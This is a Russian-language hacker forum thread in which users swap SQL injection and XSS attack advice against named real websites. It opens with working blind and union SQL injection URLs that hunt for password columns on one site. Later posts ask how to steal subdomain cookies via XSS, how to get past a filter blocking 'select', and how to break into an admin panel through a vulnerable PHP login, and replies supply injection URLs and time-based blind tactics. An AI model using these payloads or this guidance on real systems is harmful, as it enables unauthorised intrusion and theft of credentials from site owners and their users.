http://www.thechimneypot.com/newsletter.php?id=11+and+1=if(ascii(substring((select+table_name+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1),1,1))>1,1,2)--+ Либо рядом http://www.thechimneypot.com/gallery.php?category_id=17&hall_of_fame=&project_id=-336+union+select+1,2,3,4,table_name,6+from+information_schema.columns+where+column_name+like+0x257061737325--+
Есть сайт site.ru на этом сайте есть XSS-уязвимость. Есть субдомен - forum.site.ru, с него необходимо стырить куки. Можно?
Походу,тут решает переменная path в session_id,если не ошибаюсь() ).Если path=/,то куки доступны всему домену)
2mailbrush Возможность есть только если в куках прописано чтото типа domain:.site.ru А так никак, так как поддомен это уже совершенно ДРУГОЙ сайт и куки там устанавливаются ДРУГИЕ
Да, я это знаю, насчет поддоменов, просто встречались такие XSS-ки, которые работали на субдоменах. Вот, именно это я и хотел узнать. Такого нету... Теперь смысл понятен.
а чем это может меня порадовать и какие выводы можно из этого сделать? http://www.sela-shop.ru/clothes.aspx?cat=93&scat=14'
Есть где нибудь (поиск не помог) программка или скрипт для выдирания данных через blind иньекцию. Не слишком замороченная, просто что бы делила АСКИ диапазон пополам, потом ещё раз пополам итд... вобщем чтобы минимизировала число запросов?
order by помог подобрать кол-во столбцов) выяснил что сервак реагирует нехорошо на слово select. показывает 500 error) пробовал и SeLeCt и sel/**/ect не помогает( с подзапросами тоже обламывается) какие есть варианты?)
Зравсвуйте вот нашел сайтец http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&online_only=1&search=1&age_start=1'&age_end=1&country=1 помогите пожалуйста пытаюсь подобрать кол-во полей ни как ни могу перечитал все статьи по sql инъекциям.
2^YaHoo^ http://unsleep.ru/browse.php?sex_male=1&sex_female=1&photo_only=1&online_only=1&search=1&age_start=1)))+order+by+1000+--+&age_end=1&country=1 дальше сам)
HI! что можно с этим сделать http://bf2.провайдер.ru/info/index.php?IP=1'&sort=points&port=29900&liteTag=something&mode=qr3&sort=points
Даже не знаю что посоветовать. Попробуй так http://bf2.провайдер.ru/тут/типо/линк/бажный_скрипт.php?IP=1+тут+вставить+супер+пупер+ха керский+скуль+запрос+отсечь_комментарием_оставшуюс я_часть&sort=points&port=29900&liteTag=something&mode=qr3&sort=points Должен вывести аккаунт Если не выйдет , пиши, будем пробовать "Удалённо_инклудовать_файл" (с)
Всем привет, у меня такой вопрос, можно ли как нибудь попасть в админ панель. Как я вижу, что авторизация проходит так: в БД ищется юзер с соответсвующем поролем из БД. А дальше я понять не чего не могу PHP: $login = $_GET['login']; $pass = $_GET['p']; $result = mysql_query("SELECT `pass` FROM `superadmin` WHERE `login`='$login';"); $row=mysql_fetch_row($result); if(!empty($row)) { $truepass = $row[0]; if ($truepass == $pass || $truepass == md5($pass)) { // вход осуществлен else { //неверный пароль break; } else { //неверный пароль } помогите пожалуйсто разобраться
2 SeNaP уязвимый параметр login, крути как слепую, т.к. еще вывода нету, то придется заюзать бенчмарк